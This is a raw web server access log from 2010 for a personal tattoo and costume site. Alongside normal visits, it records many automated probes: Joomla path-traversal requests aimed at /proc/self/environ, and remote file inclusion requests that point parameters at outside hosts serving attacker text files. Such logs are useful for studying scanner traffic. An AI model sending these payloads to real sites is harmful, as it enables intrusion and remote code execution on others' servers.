124.188.18.224 - - [27/Jun/2010:08:10:40 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:40 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
124.188.18.224 - - [27/Jun/2010:08:10:40 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
66.249.71.237 - - [27/Jun/2010:08:12:04 -0500] "GET /logs/access_log.1274572800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.142.75.205 - - [27/Jun/2010:08:18:50 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
174.142.75.205 - - [27/Jun/2010:08:18:50 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
174.142.75.205 - - [27/Jun/2010:08:18:51 -0500] "GET /logs/access_log.1275868800//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
96.9.174.8 - - [27/Jun/2010:08:25:23 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
96.9.174.8 - - [27/Jun/2010:08:25:24 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
206.71.53.4 - - [27/Jun/2010:08:25:25 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
91.121.136.25 - - [27/Jun/2010:08:25:39 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.250.252.241 - - [27/Jun/2010:08:27:23 -0500] "GET /costume/thmb8.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
218.111.128.237 - - [27/Jun/2010:08:27:43 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.121.136.25 - - [27/Jun/2010:08:30:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
91.121.136.25 - - [27/Jun/2010:08:30:45 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
91.121.136.25 - - [27/Jun/2010:08:30:45 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
91.121.136.25 - - [27/Jun/2010:08:31:05 -0500] "GET /logs/access_log.1276128000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
206.71.53.4 - - [27/Jun/2010:08:31:24 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:31:24 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:31:24 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:31:47 -0500] "GET /logs/access_log.1276128000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.195.112.180 - - [27/Jun/2010:08:32:24 -0500] "GET /artwork/index.htm HTTP/1.0" 200 11078 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.136.63.119 - - [27/Jun/2010:08:32:49 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [27/Jun/2010:08:32:49 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
95.156.233.139 - - [27/Jun/2010:08:33:03 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:33:03 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:33:09 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:33:36 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
209.200.245.35 - - [27/Jun/2010:08:33:39 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.200.245.67 - - [27/Jun/2010:08:33:39 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.227.214.83 - - [27/Jun/2010:08:33:40 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.200.245.67 - - [27/Jun/2010:08:33:40 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.227.214.83 - - [27/Jun/2010:08:33:40 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.200.245.35 - - [27/Jun/2010:08:33:40 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
95.156.233.139 - - [27/Jun/2010:08:33:46 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:34:04 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:34:15 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:34:32 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
90.57.162.192 - - [27/Jun/2010:08:37:25 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.facebook.com/l.php?u=http%3A%2F%2Ftomdolan.pconline.com%2Fcostume%2F&h=c5cceSOJFEQNQJGeluNy2FCIx0A""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
90.57.162.192 - - [27/Jun/2010:08:37:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
90.57.162.192 - - [27/Jun/2010:08:37:28 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
90.57.162.192 - - [27/Jun/2010:08:37:29 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
90.57.162.192 - - [27/Jun/2010:08:37:29 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
90.57.162.192 - - [27/Jun/2010:08:37:29 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
85.235.154.15 - - [27/Jun/2010:08:38:32 -0500] "GET /logs/access_log.1266710400//?path%5Bdocroot%5D=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.235.154.15 - - [27/Jun/2010:08:38:32 -0500] "GET //?path%5Bdocroot%5D=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
85.235.154.15 - - [27/Jun/2010:08:38:32 -0500] "GET /logs//?path%5Bdocroot%5D=http://t0l.fileave.com/byroe/fxid1.txt??? HTTP/1.1" 200 11111 "-""Mozilla/5.0"
95.156.233.139 - - [27/Jun/2010:08:38:42 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:38:42 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:38:42 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
206.71.53.4 - - [27/Jun/2010:08:40:11 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:40:18 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
95.156.233.139 - - [27/Jun/2010:08:40:49 -0500] "GET /logs/access_log.1276732800///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:04 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:04 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:04 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:25 -0500] "GET /logs/access_log.1276819200///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:25 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:25 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:28 -0500] "GET /logs/access_log.1276732800///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:32 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:32 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:32 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:38 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:38 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:38 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:46 -0500] "GET /logs/access_log.1276214400///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:41:47 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:42:09 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:42:09 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:42:09 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:42:17 -0500] "GET /logs/access_log.1276819200///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:42:18 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:42:18 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:42:20 -0500] "GET /logs/access_log.1276732800///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:42:26 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
79.170.45.162 - - [27/Jun/2010:08:44:31 -0500] "GET ///index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.836"
96.9.174.8 - - [27/Jun/2010:08:44:37 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
96.9.174.8 - - [27/Jun/2010:08:44:38 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
96.9.174.8 - - [27/Jun/2010:08:44:38 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
95.156.233.139 - - [27/Jun/2010:08:44:57 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:44:57 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
95.156.233.139 - - [27/Jun/2010:08:44:57 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
96.9.174.8 - - [27/Jun/2010:08:45:01 -0500] "GET /logs/access_log.1276128000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
207.46.199.177 - - [27/Jun/2010:08:46:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.156.233.139 - - [27/Jun/2010:08:46:14 -0500] "GET /logs/access_log.1276214400///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
96.9.174.8 - - [27/Jun/2010:08:46:15 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
96.9.174.8 - - [27/Jun/2010:08:46:15 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
96.9.174.8 - - [27/Jun/2010:08:46:15 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
95.156.233.139 - - [27/Jun/2010:08:46:30 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
96.9.174.8 - - [27/Jun/2010:08:46:36 -0500] "GET /logs/access_log.1276128000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
209.200.245.67 - - [27/Jun/2010:08:46:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.200.245.67 - - [27/Jun/2010:08:46:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.227.214.83 - - [27/Jun/2010:08:46:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.200.245.67 - - [27/Jun/2010:08:46:45 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.200.245.67 - - [27/Jun/2010:08:46:45 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.227.214.83 - - [27/Jun/2010:08:46:45 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.200.245.67 - - [27/Jun/2010:08:46:45 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.200.245.67 - - [27/Jun/2010:08:46:45 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.227.214.83 - - [27/Jun/2010:08:46:45 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.200.245.35 - - [27/Jun/2010:08:46:48 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.200.245.35 - - [27/Jun/2010:08:46:48 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.200.245.35 - - [27/Jun/2010:08:46:48 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.200.245.35 - - [27/Jun/2010:08:47:13 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.200.245.35 - - [27/Jun/2010:08:47:14 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.200.245.35 - - [27/Jun/2010:08:47:14 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
206.71.53.4 - - [27/Jun/2010:08:47:20 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:47:20 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.227.214.83 - - [27/Jun/2010:08:47:44 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.227.214.83 - - [27/Jun/2010:08:47:44 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.227.214.83 - - [27/Jun/2010:08:47:44 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.200.245.67 - - [27/Jun/2010:08:48:32 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.227.214.83 - - [27/Jun/2010:08:48:33 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.200.245.35 - - [27/Jun/2010:08:48:33 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.200.245.67 - - [27/Jun/2010:08:48:34 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:48:36 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.200.245.35 - - [27/Jun/2010:08:49:01 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.227.214.83 - - [27/Jun/2010:08:49:29 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.136.63.119 - - [27/Jun/2010:08:51:02 -0500] "GET /logs/access_log.1274400000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [27/Jun/2010:08:51:02 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [27/Jun/2010:08:51:03 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.136.63.119 - - [27/Jun/2010:08:51:04 -0500] "GET /logs/access_log.1275868800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.203.13.114 - - [27/Jun/2010:08:51:21 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?client=opera&rls=ru&q=vintage+tattoo&sourceid=opera&ie=utf-8&oe=utf-8""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:21 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:24 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
213.165.85.241 - - [27/Jun/2010:08:51:28 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.203.13.114 - - [27/Jun/2010:08:51:28 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:28 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:28 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:29 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:29 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
